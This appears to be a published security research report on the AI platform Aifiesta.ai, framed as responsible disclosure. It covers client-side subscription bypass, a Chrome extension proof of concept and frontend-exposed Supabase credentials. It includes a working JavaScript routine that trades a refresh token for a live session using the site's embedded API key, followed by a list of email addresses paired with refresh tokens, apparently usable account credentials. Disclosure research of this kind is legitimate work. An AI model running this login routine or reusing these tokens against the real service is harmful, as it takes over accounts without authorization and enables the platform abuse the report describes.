Educational security research report covering client-side bypass, exposed API infrastructure, and proof-of-concept artifacts.
Disclaimer • Executive Summary • Scope • Findings • Chrome Extension PoC • API Infrastructure • Recommendations
IMPORTANT LEGAL NOTICE:
This security assessment was conducted for educational and security research purposes only. The intention is to demonstrate potential security vulnerabilities with live proof-of-concept to help improve the platform's security posture.
- ❌ NOT intended to harm the business or its operations
- ❌ NOT intended for malicious exploitation
- ✅ Conducted to identify and responsibly disclose security issues
- ✅ All testing performed on publicly accessible endpoints
This report documents observed security weaknesses in Aifiesta.ai from a proof-of-concept security assessment. The assessment demonstrates that some subscription and account-access controls can be influenced from the client side, and that frontend-exposed Supabase API infrastructure may enable automated abuse scenarios if not protected by server-side validation, rate limiting, and abuse controls.
| Report Item | Detail |
|---|---|
| Target | Aifiesta.ai |
| Assessment Type | Educational security research / proof-of-concept |
| Primary Artifacts | Chrome extension proof of concept, account access proof of concept |
| Core Risk Area | Client-side trust, exposed API infrastructure, automated account abuse |
| Intended Outcome | Responsible disclosure and improved platform security posture |
| Area | Included Evidence |
|---|---|
| Chrome extension PoC | Installation flow and demonstrated UI/client-side bypass behavior |
| Frontend validation | Client-side subscription bypass and UI state manipulation |
| Account access testing | Refresh-token based proof-of-concept flow for security testing only |
| Abuse-risk analysis | Automated account creation, OTP bombing, spam, and resource abuse |
| Public endpoints | Testing performed on publicly accessible endpoints |
| ID | Finding | Risk Theme | Status |
|---|---|---|---|
| AF-001 | Client-side subscription bypass | Authorization control | Demonstrated |
| AF-002 | Email field manipulation | Privacy concern | Demonstrated |
| AF-003 | UI state manipulation | Client-side trust | Demonstrated |
| AF-004 | Exposed Supabase API infrastructure | Platform abuse | Demonstrated |
chrome://extensions/ → Developer Mode → Load unpacked- Client-side subscription bypass (frontend validation only)
- Email field manipulation (privacy concern demonstration)
- UI state manipulation (visual bypass proof)
| Field | Detail |
|---|---|
| Category | Authorization / client-side validation |
| Observation | Subscription-related state can be influenced from the frontend |
| Original Evidence | Client-side subscription bypass (frontend validation only) |
| Business Impact | Users may visually or functionally bypass subscription gates |
| Recommended Fix | Enforce subscription checks server-side for every gated action |
| Field | Detail |
|---|---|
| Category | Privacy / data integrity |
| Observation | Email-related field manipulation was demonstrated |
| Original Evidence | Email field manipulation (privacy concern demonstration) |
| Business Impact | User identity display or account metadata may be misused |
| Recommended Fix | Treat frontend fields as untrusted and validate on API |
| Field | Detail |
|---|---|
| Category | Client-side trust |
| Observation | UI state can be manipulated for visual bypass proof |
| Original Evidence | UI state manipulation (visual bypass proof) |
| Business Impact | Users may be misled by UI-only access indicators |
| Recommended Fix | Keep UI state derived from authenticated server data |
Finding: Frontend exposes Supabase API credentials enabling:
- Automated account creation at scale
- Email service abuse through OTP bombing
- Resource consumption attacks
- Platform spam and abuse
| Field | Detail |
|---|---|
| Category | API exposure / abuse prevention |
| Observation | Frontend-exposed Supabase API credentials can be reused by clients |
| Affected Risk Areas | Account creation, OTP abuse, resource consumption, spam |
| Business Impact | Increased infrastructure cost, degraded user trust, and abuse exposure |
| Recommended Fix | Rotate exposed keys where appropriate and add abuse controls |
For security testing only:
async function login1337(token) {
const res = await fetch('https://ubipcxqbjqyzcisxiugn.supabase.co/auth/v1/token?grant_type=refresh_token', {
method: 'POST',
headers: {
'apikey': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6InViaXBjeHFianF5emNpc3hpdWduIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NTE1ODAzMzAsImV4cCI6MjA2NzE1NjMzMH0.adJrFDJGZNWQCdQKIiOtMTrxkO3_z7s0-iwO5yOlZGU',
'Content-Type': 'application/json'
},
body: JSON.stringify({
refresh_token: token
})
});
const data = await res.json();
if (res.ok) {
localStorage.setItem("sb-ubipcxqbjqyzcisxiugn-auth-token", JSON.stringify(data));
console.log("🚀 Logged in successfully");
return data;
}
throw new Error(data.error_description || 'Login failed');
};
login1337("gxmnlks75rgc")
=email,refreshToken
jboi86qqseoy@dugmail.com,bpznkxnzyr22
tly8246eqcgd@corhash.net,kl46pu7sh4ea
2kgbdziolefy@dugmail.com,r23kfz2twfvt
- Implement server-side subscription validation
- Secure API keys and rotate regularly
- Add rate limiting for account creation
- Implement CAPTCHA for OTP requests
| Priority | Action | Goal |
|---|---|---|
| High | Implement server-side subscription checks | Remove trust from client-side validation |
| High | Add rate limiting for account creation | Reduce automated account abuse |
| High | Implement CAPTCHA for OTP requests | Reduce OTP bombing risk |
| Medium | Secure API keys and rotate regularly | Limit impact of exposed credentials |
| Medium | Monitor auth and OTP request patterns | Detect abuse before it scales |
| Medium | Log and alert on suspicious account activity | Improve response and investigation speed |
This report is intended to support responsible disclosure. The findings and proof-of-concept material should be shared only with authorized stakeholders and used to improve Aifiesta.ai's security posture.